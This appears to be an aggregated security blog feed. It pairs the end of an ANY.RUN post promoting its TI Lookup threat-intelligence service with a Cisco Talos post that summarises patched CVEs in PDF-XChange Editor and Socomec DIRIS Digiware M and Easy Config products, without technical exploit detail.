The industry & geo threat landscape in TI Lookup improves the SOC metrics that matter most by adding instant industry and country context to every search: 

  • Shorter Mean Time to Detect: Analysts immediately see whether a threat is actually observed in their industry and regions, so they confirm real incidents faster instead of spending time qualifying generic indicators. 
  • Faster Mean Time to Respond: Each relevant landscape slice comes with ready IOCs and behavior context from real sandbox runs, shortening investigation steps and helping teams move to containment and remediation sooner. 
  • Lower false positive rate: Alerts tied to threats that never appear in the organization’s industry or geography can be safely downgraded, reducing noise and cutting time spent on benign events. 
  • Wider detection coverage: Detection engineering uses industry and geo statistics from TI Lookup to prioritize rules and playbooks for the threats that most often impact similar organizations. 
  • Better analyst performance per incident: With clearer relevance and richer context up front, analysts can close more meaningful cases per shift instead of circling around low-value alerts. 

Try Threat Intelligence Lookup in Your SOC 

TI Lookup with the geo & threat landscape functionality is available to all Premium subscription users. Contact us to request trial access and see how our solution can accelerate and improve the work of your security team. 


Conclusion 

Threat Intelligence Lookup reveals critical industry and geographic context in every threat search. Analysts can turn scattered IOCs into actionable insights that are relevant to your organization. Narrow the global threat landscape for more efficient proactive research and threat hunting. 

Backed by real-time analysis from 15,000 organizations, TI Lookup helps teams prioritize faster, sharpen detection, reduce false positives, and improve MTTR. Security teams can finally focus on the threats most likely to impact their specific environment and proactively set up defenses. 

About ANY.RUN 

As a leading provider of interactive malware analysis and threat intelligence, ANY.RUN is trusted by over 500,000 analysts across 15,000 organizations worldwide. Its solutions enable teams to investigate threats in real time, trace full execution chains, and surface critical behaviors within seconds. 

Safely detonate samples, interact with them as they run, and instantly pivot to network traces, file system changes, registry activity, and memory artifacts in ANY.RUN’s Interactive Sandbox. For threat intelligence insights, integrate TI Lookup and TI Feeds supplying enriched IOCs and automation-ready intelligence. No infrastructure maintenance is required.  

ANY.RUN’s Cybersecurity Blog – Read More

Socomec DIRIS Digiware M series and Easy Config, PDF XChange Editor vulnerabilities

Cisco Talos’ Vulnerability Discovery & Research team recently disclosed an out-of-bounds read vulnerability in PDF XChange Editor, and ten vulnerabilities in Socomec DIRIS Digiware M series and Easy Config products.

The vulnerabilities mentioned in this blog post have been patched by their respective vendors, all in adherence to Cisco’s third-party vulnerability disclosure policy.    

For Snort coverage that can detect the exploitation of these vulnerabilities, download the latest rule sets from Snort.org, and our latest Vulnerability Advisories are always posted on Talos Intelligence’s website.     

PDF XChange vulnerabilities

Discovered by KPC of Cisco Talos.

PDF XChange Editor is freemium software used to create, edit, digitally sign, and otherwise handle PDF files. Talos discovered TALOS-2025-2280 (CVE-2025-58113), an out-of-bounds read vulnerability in the EMF functionality of PDF-XChange Co. Ltd PDF-XChange Editor 10.7.3.401. By using a specially crafted EMF file, an attacker could exploit this vulnerability to perform an out-of-bounds read, potentially leading to the disclosure of sensitive information.

Socomec vulnerabilities

Discovered by Kelly Patterson of Cisco Talos.

Talos discovered nine vulnerabilities in the Socomec DIRIS Digiware M-70 version 1.6.9. DIRIS Digiware M series are multifunction communication gateways that act as a point of access to Digiware systems, combining power supply and communication control monitoring. 

One disclosed vulnerability is also in the Socomec Easy Config System. This software is used to configure and monitor Socomec power monitoring and control equipment. 

Socomec DIRIS Digiware M Series

TALOS-2024-2115 (CVE-2024-48894) is a cleartext transmission vulnerability. Specially crafted HTTP requests can lead to a disclosure of sensitive information. An attacker can sniff network traffic to trigger this vulnerability.

TALOS-2024-2116 (CVE-2024-53684) is a cross-site request forgery. A specially crafted HTTP request can lead to unauthorized access. An attacker can stage a malicious webpage to trigger this vulnerability.

TALOS-2024-2118 (CVE-2024-49572) is a denial-of-service vulnerability. A specially crafted network packet can lead to denial of service and weaken credentials, resulting in default documented credentials being applied to the device. An attacker can send an unauthenticated packet to trigger this vulnerability.

TALOS-2024-2119 (CVE-2024-48882) is a denial-of-service vulnerability. A specially crafted network packet can lead to denial of service. An attacker can send an unauthenticated packet to trigger this vulnerability.

TALOS-2025-2138 (CVE-2025-20085) is a denial-of-service vulnerability. A specially crafted network packet can lead to denial of service and weaken credentials, resulting in default documented credentials being applied to the device. An attacker can send an unauthenticated packet to trigger this vulnerability.

TALOS-2025-2139 (CVE-2025-23417) is a denial-of-service vulnerability. A specially crafted network packet can lead to denial of service. An attacker can send an unauthenticated packet to trigger this vulnerability.

TALOS-2025-2248 (CVE-2025-54848-CVE-2025-54851) is a denial-of-service vulnerability in the Modbus TCP and Modbus RTU over TCP functionalities. A specially crafted series of network requests can lead to a denial of service. An attacker can send a sequence of unauthenticated packets to trigger this vulnerability.

TALOS-2025-2251 (CVE-2025-55221-CVE-2025-55222) is a denial-of-service vulnerability in the Modbus TCP and Modbus RTU over TCP USB Function functionalities. A specially crafted network packet can lead to a denial of service. An attacker can send an unauthenticated packet to trigger this vulnerability.

TALOS-2025-2152 (CVE-2025-26858) is a buffer overflow vulnerability in the Modbus TCP functionality. A specially crafted set of network packets can lead to denial of service. An attacker can send a sequence of unauthenticated packets to trigger this vulnerability.

Socomec Easy Config System

TALOS-2024-2117 (CVE-2024-45370) is an authentication bypass vulnerability in the User profile management functionality. A specially crafted database record can lead to unauthorized access. An attacker can modify a local database to trigger this vulnerability.

Cisco Talos Blog – Read More